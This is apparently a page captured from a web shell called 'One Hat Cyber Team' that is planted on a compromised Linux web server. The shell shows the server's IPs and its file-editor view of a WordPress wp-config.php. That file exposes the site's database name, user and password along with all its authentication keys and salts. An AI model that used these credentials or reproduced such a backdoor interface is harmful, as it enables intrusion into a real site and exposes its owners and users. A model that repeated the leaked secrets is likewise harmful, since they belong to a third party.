⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.113
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
vhosts
/
raqmix.net
/
kime.raqmix.net
/
Edit File: wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'kime_wp' ); /** Database username */ define( 'DB_USER', 'kime_wp' ); /** Database password */ define( 'DB_PASSWORD', 'Cf3Ywk42^pgZlq?w' ); /** Database hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '_0J_!56(0bc:03)[87Yy;SS6-|Xi2seo+s%8p#3[-DQu%7P4f1q(ct+S2Vq@CXxI'); define('SECURE_AUTH_KEY', 'o)A76ID)L:G99dzrOq6H-A3s2T32|wIp~[J%|(~4KJc;[2yrX8;9)5@qd1:eL&AV'); define('LOGGED_IN_KEY', ';EVyW+tU9wpa(Y5iTRe92k30&e2BJf08W)&6000@R1~(Xhp-(l+5[&7uU_5oQR0z'); define('NONCE_KEY', '0gg)s8A7!N*(!p3@C7:8r]a-pl02YFwoF9rH802/7p6PlwhRU7#9jn7e0D~U9cF9'); define('AUTH_SALT', '5@p2m4~|h9hYr4r7qZr6u@(3anA%4@WGLva4i*5|3~wl85Am[J*5bDdmIP:1PBtX'); define('SECURE_AUTH_SALT', '+3cXuE4-Ed;762zWmkfV397I9ahRztrAx3k#UI*1D1~U3E*o:26+8gspdO3bAIgE'); define('LOGGED_IN_SALT', 'a@Cd5&|E6Dz990jO/2]wG07fzz7D5fplBa~Boyo82+44tU8GRuL4ts+oQN7En;(1'); define('NONCE_SALT', ';2%zJASV#yMO[cr*fK]MEIt4(Ypz994q8zo46DCL]OgN7+P1)(2F4u+;b7[/6b|_'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'kime_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); define('WP_AUTO_UPDATE_CORE', false); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'DISALLOW_FILE_EDIT', true ); define( 'CONCATENATE_SCRIPTS', false ); define( 'DISABLE_WP_CRON', true ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Simpan